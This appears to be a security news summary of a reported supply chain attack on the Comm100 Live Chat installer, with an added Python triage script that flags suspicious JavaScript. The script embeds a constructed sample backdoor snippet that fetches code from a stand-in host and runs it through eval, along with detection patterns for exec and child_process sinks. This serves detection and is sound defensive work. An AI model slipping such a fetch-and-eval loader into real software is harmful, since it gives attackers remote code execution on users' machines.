CrowdStrike recently published a report detailing a new supply chain attack in which the installer of a popular commercial chat-based customer engagement platform was used to spread malware.
Key findings
The attack delivered trojanized malware via the installer for Comm100's Windows desktop agent software, Comm100 Live Chat. The trojanized installer reportedly remained available on Comm100's website from September 26 to September 29.
The infected installer carried a valid digital signature from a Comm100 Network Corporation certificate, allowing it to launch without triggering antivirus warnings.
The attackers implanted a JavaScript backdoor into the "main.js" file present in Comm100 Live Chat installer versions 10.0.72 and 10.0.8.
The backdoor fetches a second-stage obfuscated JavaScript file from a hard-coded URL, giving the attackers remote shell access to the compromised endpoints.
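Because the installer's code signature was valid, signature checks alone would not have caught this; a content-level triage of the application's own JavaScript is the check a defender wants. The following is an added example, not code from CrowdStrike or Comm100: a heuristic that flags a JS file combining a hard-coded URL to a non-vendor host, a network fetch primitive, and a dynamic-code sink. The embedded sample is constructed to have that shape and is not the real backdoor; the trusted-host list is an assumption supplied by the analyst.

```python
import re
from typing import Dict, Iterable
from urllib.parse import urlsplit

# Constructed sample in the shape described above (NOT the real main.js):
# hard-coded URL + network fetch + dynamic-code sink in one file.
SAMPLE_MAIN_JS = r"""
const https = require('https');
https.get('https://stage2.example.invalid/a.js', res => {
  let body = '';
  res.on('data', c => body += c);
  res.on('end', () => eval(body));
});
"""

URL_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]""")
FETCH_RE = re.compile(r"\b(?:https?\.get|https?\.request|fetch|axios|XMLHttpRequest)\b")
SINK_RE = re.compile(r"\b(?:eval|new Function|vm\.runIn\w+Context|child_process|exec|spawn)\b")

def triage_js(source: str, trusted_hosts: Iterable[str] = ()) -> Dict[str, object]:
    """Return hard-coded hosts, fetch/sink hits and a verdict for one JS source."""
    trusted = {h.lower() for h in trusted_hosts}          # analyst-supplied allowlist
    hosts = sorted({(urlsplit(u).hostname or "").lower() for u in URL_RE.findall(source)})
    untrusted = [h for h in hosts if h and h not in trusted]
    fetches = sorted(set(FETCH_RE.findall(source)))
    sinks = sorted(set(SINK_RE.findall(source)))
    # The signal is the combination, not any single hit: unknown host AND a
    # fetch primitive AND a sink that turns fetched bytes into code or a shell.
    verdict = "review" if untrusted and fetches and sinks else "clean"
    return {"hosts": hosts, "untrusted_hosts": untrusted,
            "fetches": fetches, "sinks": sinks, "verdict": verdict}

def triage_file(path: str, trusted_hosts: Iterable[str] = ()) -> Dict[str, object]:
    """Triage a JS file on disk, e.g. an unpacked Electron app's main.js."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return triage_js(f.read(), trusted_hosts)

if __name__ == "__main__":
    import json, sys
    # Pass a path to triage a real file; with no argument the constructed sample is used.
    result = triage_file(sys.argv[1]) if len(sys.argv) > 1 else triage_js(SAMPLE_MAIN_JS)
    print(json.dumps(result, indent=2))
```

A "review" verdict is a triage lead for an analyst, not a conviction; legitimate updaters also fetch code, so the allowlist of vendor hosts is what separates expected behaviour from an implant.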
Post-compromise activity
The attackers were observed deploying malicious loaders ("MidlrtMd.dll") that use the DLL search-order hijacking technique to load the payload directly from memory within Windows processes.
The malicious loader fetches the final payload ("license") from the C2 and decrypts it with a hard-coded RC4 key.
Attribution
With moderate confidence, CrowdStrike researchers have attributed the attack to China-based threat actors, based on Chinese-language comments in the malware, the use of Alibaba infrastructure to host servers, and other matching factors.
Closing thoughts
Comm100 has released Live Chat application version 10.0.9, a clean installer, and recommends that users update the Live Chat application immediately. The Canadian Centre for Cyber Security published an alert about the incident involving the trojanized version of the Comm100 Live Chat application.